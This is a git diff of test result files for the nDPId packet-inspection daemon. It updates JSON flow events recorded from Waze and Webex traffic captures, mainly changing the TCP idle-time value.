+00920{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1435587868634,"flow_last_seen":1435587888318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17204,"flow_tot_l4_payload_len":79914,"flow_avg_l4_payload_len":746,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587868635,"flow_last_seen":1435587884546,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3606,"flow_tot_l4_payload_len":9966,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1435587894241,"flow_last_seen":1435587901093,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":5269,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00918{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587905035,"flow_last_seen":1435587907392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":4480,"flow_avg_l4_payload_len":194,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1435587878606,"flow_last_seen":1435587882306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11132,"flow_tot_l4_payload_len":42871,"flow_avg_l4_payload_len":1339,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1435587879018,"flow_last_seen":1435587882336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1435587879850,"flow_last_seen":1435587883075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8096,"flow_tot_l4_payload_len":26354,"flow_avg_l4_payload_len":941,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00571{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880587,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.198","src_port":43089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1435587871939,"flow_last_seen":1435587873226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3994,"flow_tot_l4_payload_len":8301,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1435587868996,"flow_last_seen":1435587869400,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":1420,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1435587878215,"flow_last_seen":1435587880857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21888,"flow_tot_l4_payload_len":57094,"flow_avg_l4_payload_len":1730,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} 
+00816{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00570{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1435587867443,"flow_last_seen":1435587867753,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","packets-captured":597,"packets-processed":597,"total-skipped-flows":0,"total-l4-data-len":326183,"total-not-detected-flows":1,"total-guessed-flows":9,"total-detected-flows":23,"total-detection-updates":29,"total-updates":0,"current-active-flows":0,"total-active-flows":33,"total-idle-flows":33,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":229,"global_ts_msec":1435587907392} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 597/597 diff --git a/test/results/webex.pcap.out b/test/results/webex.pcap.out index 4d7e9bf86..1760dc31e 100644 --- a/test/results/webex.pcap.out +++ b/test/results/webex.pcap.out 
@@ -1,385 +1,385 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"webex.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1444570624853} -00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570624853,"flow_last_seen":1444570624853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570624853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1444570624853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570624853,"pkt":"ABoRAAACABoRAAABCABFAAA8OXNAAEAGTZUKCAABQERpZ6GCAbtPGIcMAAAAAKACOQgjFwAAAgQFtAQCCAoATL5\/AAAAAAEDAwY="} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoAQ5AABAGtg5ARGlnCggAAQG7oYKw53jzTxiHDVAS\/\/9Y4AAA"} 